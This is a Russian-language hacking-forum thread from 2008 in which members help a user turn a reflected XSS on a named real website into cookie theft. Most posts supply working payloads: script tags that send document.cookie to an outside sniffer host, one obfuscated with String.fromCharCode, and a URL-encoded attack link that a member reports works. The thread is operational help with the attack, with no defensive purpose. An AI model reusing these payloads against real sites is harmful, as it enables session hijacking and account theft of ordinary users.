не шлются кукисы

Discussion in 'Уязвимости' started by popel, 4 Aug 2008.

Thread Status:
Not open for further replies.
  1. popel

    popel New Member

    Joined:
    15 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Допустим есть пассив xss, юзаю снифф каника
    http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua

    заменяю на
    http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.href='http://xxx.ru/s.gif?'+document.cookie%3C/script%3E&url=http://vital.h.com.ua не перенапрявляет на снифф=>кукисы не шлются
    обрабатывается тока
    http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.href='http://xxx.ru/s.gif'%3C/script%3E&url=http://vital.h.com.ua
    Пробовал с разными xss
    Не пинать)))
     
    #1 popel, 4 Aug 2008
    Last edited: 4 Aug 2008
  2. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Вместо "xxx.ru/s.gif?" попробуй "http://xxx.ru/s.gif?"
     
    #2 .nor, 4 Aug 2008
  3. popel

    popel New Member

    Joined:
    15 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    я так и делал, просто в теме неправильно указал, уже исправил
     
    #3 popel, 4 Aug 2008
  4. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Code:
    "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
    Это робит?
     
    #4 .nor, 4 Aug 2008
  5. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    ? и + фильтруются.
     
    #5 freddi, 4 Aug 2008
    2 people like this.
  6. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    "><script>img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47,47,120,120,120,46,114,117,47,115,46,103,105,102,63)+document.cookie;</script>
    или так
    я имею ввиду http://xxx замени на String.fromCharCode(
    можно на don12.vip.su
     
    #6 Don1=2, 4 Aug 2008
    Last edited: 4 Aug 2008
  7. popel

    popel New Member

    Joined:
    15 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    пробовал вышеизложенное, не робит
    на примере показать бы

    http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('ggg')%3C/script%3E&url=http://vital.h.com.ua

    заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
    резальта нет( или неправильный код?)
     
    #7 popel, 4 Aug 2008
  8. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    я пробовал своим так
    Code:
    http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
    работает. Снифф точно рабочий?
     
    #8 .nor, 4 Aug 2008
  9. popel

    popel New Member

    Joined:
    15 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    .nor, спс
    Всё выполнилось, используя твой посл код))
    тока после этого попробовал сам
    http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;%3C/script%3E - не робит)
    Какой исходный код? без обработки браузером, а то хз %3D,%2F чего откуда)))))
     
    #9 popel, 4 Aug 2008
  10. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Code:
    "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
     
    #10 [Raz0r], 4 Aug 2008
  11. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Исходный
    Code:
    "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
     
    #11 .nor, 4 Aug 2008
  12. popel

    popel New Member

    Joined:
    15 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
    как расшифровывается???

    заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

    получаю нерабочий
    http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3E"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>%3C/script%3E
     
    #12 popel, 4 Aug 2008
  13. .nor

    .nor Elder - Старейшина

    Joined:
    29 Jun 2007
    Messages:
    50
    Likes Received:
    7
    Reputations:
    0
    Code:
    "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
    заменять надо не alert('ggg'), а <script>alert('ggg')</script>
     
    #13 .nor, 4 Aug 2008
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    &url=http://vital.h.com.ua ))))))))))
     
    #14 sabe, 5 Aug 2008
(You must log in or sign up to post here.)
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.